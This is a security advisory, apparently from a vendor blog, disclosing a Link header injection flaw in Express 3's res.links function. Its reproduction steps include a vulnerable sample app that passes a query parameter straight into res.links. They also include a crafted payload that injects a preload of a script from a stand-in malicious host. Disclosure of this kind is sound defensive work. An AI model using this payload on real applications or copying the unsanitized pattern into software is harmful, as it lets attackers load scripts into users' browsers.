Overview
A vulnerability has been identified in the Express response.links function, allowing for arbitrary resource injection in the Link header when unsanitized data is used.
The issue arises from improper sanitization in `Link` header values, which can allow a combination of characters like `,`, `;`, and `<>` to preload malicious resources.
This vulnerability is especially relevant for dynamic parameters.
Details
Module Info
- Product: Express
- Affected packages: Express
- Affected versions: <=3.21.2
- GitHub repository: https://github.com/expressjs/express
- Published packages: https://www.npmjs.com/package/express
- Package manager: npm
Steps To Reproduce
- Create an Express application and configure res.links to set value from query param:
var express = require('express')
var app = express()
app.get('/', function (req, res) {
res.links({"preload": req.query.resource});
res.send('ok');
});
app.listen(3000);
- Use a specially-crafted payload to set multiple links header. For example:
// note how the query param uses < > to load arbitrary resource
const maliciousQueryParam = '?resource=http://api.example.com/users?resource=>; rel="preload", <http://api.malicious.com/1.js>; rel="preload"; as="script", <http:/api.example.com';
const url = `http://localhost:3000/${maliciousQueryParam}`;
fetch(url);
- We can note how multiple headers have been set:
<http://api.example.com/users?resource=>; rel="preload", <http://api.malicious.com/1.js>; rel="preload"; as="script", <http:/api.example.com>; rel="preload"
Proof Of Concept
A full reproduction with code similar to the above can be found here:
<source> resource injection vulnerability POC
Credits
- Abze
Mitigation
The Express project is End-of-Life and will not receive any updates to address this issue. For more information see here.
Users of the affected components should apply one of the following mitigations:
- Migrate affected applications away from Express 3.
- Leverage a commercial support partner like HeroDevs for post-EOL security support.
Stay secure and ensure your systems are updated with the latest patches from HeroDevs. For more insights and security updates, keep following our blog.
Get alerted whenever a new vulnerability is fixed in the open source software we support.